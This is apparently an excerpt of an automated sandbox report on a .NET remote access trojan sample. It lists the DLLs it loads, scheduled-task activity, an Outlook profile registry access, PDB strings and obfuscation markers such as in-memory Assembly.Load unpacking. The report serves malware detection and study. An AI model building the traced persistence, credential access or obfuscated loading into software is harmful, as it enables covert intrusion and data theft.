                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: \??\C:\Windows\mscorlib.pdb T source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdbXT source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb#x source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.PDB source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbeAjDPT.pdbpdbDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdbd source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Configuration.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Core.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: n8C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
                Source: Binary string: System.pdbH source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: mscorlib.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: C:\Windows\PHCUmkeAjDPT.pdbpdbDPT.pdb li source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: PHCUmkeAjDPT.pdb089 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: System.ni.pdb source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: nC:\Users\user\Desktop\PHCUmkeAjDPT.pdbp source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
                Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb8B source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs.Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4309428.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs.Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs.Net Code: ciZouWdrpu System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.7b30000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeCode function: 0_2_093B173C push 43E8CE8Bh; iretd 0_2_093B175A
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 12_2_0509F3F0 push eax; iretd 12_2_0509F3F1
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D99C30 push esp; retf 0271h16_2_00D99D55
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeStatic PE information: section name: .text entropy: 7.689431828463277
                Source: zDAKFK.exe.0.drStatic PE information: section name: .text entropy: 7.689431828463277
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, Geok9UDGmJnESskYk6.csHigh entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, DcHUM92j2w5Tv1Pf7E.csHigh entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, bieio6Q9YImFOfmWOy.csHigh entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ItnMZkLQR3l5sMrDFi.csHigh entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ux2XFhK0MLC0DLZuGq.csHigh entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, FPXSFTjke38EUsFwMQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, bIslAo5xLyfYTdWbDU.csHigh entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, FFL5rbCmJqMKZgE8Ip.csHigh entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, lM8lcJnctlp2rWEnaI.csHigh entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ajVBtPWDB3rCCiSSxWl.csHigh entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, oho6rBSwnEYaeTlMlB.csHigh entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, J1eemHk4KmHXVbcVHe.csHigh entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, ohCSjHuOgcn8LMxW9w.csHigh entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, fEaTuDV8YOyfDce1Gr.csHigh entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, eCybnUUGdbGwloyBj7.csHigh entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, Pc5EbqW7of4KtsoFdbm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, qPR26bWP9YqtF728xSp.csHigh entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, tc6CFuwhhqKghWoavi.csHigh entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4d489d8.0.raw.unpack, KpGIMg9jS35kOWayWB.csHigh entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, Geok9UDGmJnESskYk6.csHigh entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, DcHUM92j2w5Tv1Pf7E.csHigh entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, bieio6Q9YImFOfmWOy.csHigh entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ItnMZkLQR3l5sMrDFi.csHigh entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ux2XFhK0MLC0DLZuGq.csHigh entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, FPXSFTjke38EUsFwMQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, bIslAo5xLyfYTdWbDU.csHigh entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, FFL5rbCmJqMKZgE8Ip.csHigh entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, lM8lcJnctlp2rWEnaI.csHigh entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ajVBtPWDB3rCCiSSxWl.csHigh entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, oho6rBSwnEYaeTlMlB.csHigh entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, J1eemHk4KmHXVbcVHe.csHigh entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, ohCSjHuOgcn8LMxW9w.csHigh entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
